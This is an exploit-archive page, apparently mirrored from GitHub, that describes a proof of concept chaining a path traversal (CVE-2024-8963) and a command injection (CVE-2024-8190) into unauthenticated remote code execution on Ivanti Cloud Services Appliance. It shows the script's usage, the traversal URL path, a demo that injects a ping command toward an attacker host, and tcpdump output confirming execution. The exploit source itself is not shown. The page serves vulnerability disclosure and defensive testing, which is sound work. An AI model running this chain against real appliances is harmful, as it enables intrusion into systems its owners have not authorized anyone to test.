Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-8190 PoC — Ivanti Cloud Services Appliance 安全漏洞

Source
https://github.com/flyingllama87/CVE-2024-8190-unauth
Associated Vulnerability
Title:Ivanti Cloud Services Appliance 安全漏洞 (CVE-2024-8190)
Description:An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.
Description
Combining CVE-2024-8963 & CVE-2024-8190 - For Unauthenticated RCE on Ivanti CSA 4.6 and below
Readme
## CVE-2024-8190 unauthenticated

### Description
Combining CVE-2024-8963 & CVE-2024-8190 - PoC for Unauthenticated RCE on Ivanti CSA 4.6 and below.

**CVE-2024-8963**
> Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality.

**CVE-2024-8190**
> An OS command injection vulnerability in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and before allows a remote authenticated attacker to obtain remote code execution. The attacker must have admin level privileges to exploit this vulnerability.

This PoC combines the two to demonstrate how CVE-2024-8190 can be used unauthenticated.

### Usage

```
python3 ./cve-2024-8190.py <target_url> '<CMD>'
```

#### Demo

```
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNING: This script is for authorized testing and educational purposes only. Unauthorized use is illegal.
[*] Fetching https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Got LDCSA_CSRF value: sid:483045<REMOVED>
[*] Sending payload...
[!] Request timed out. Check if the command executed on the target.
```

#### Response
```
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
```

### Thanks

Horizon3.ai's CVE-2024-8190 PoC this is heavily based off: <BR />
https://github.com/horizon3ai/CVE-2024-8190

ProjectDiscovery's nuclei template for CVE-2024-8963.yaml: <BR />
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml

P.S. ProjectDiscovery rocks!

### Disclaimer

Don't be a dickhead.

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/ba11d8c3c065cf664e45f4d69c320035c0e86adb
├── [2.2K]  cve-2024-8190.py
└── [2.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →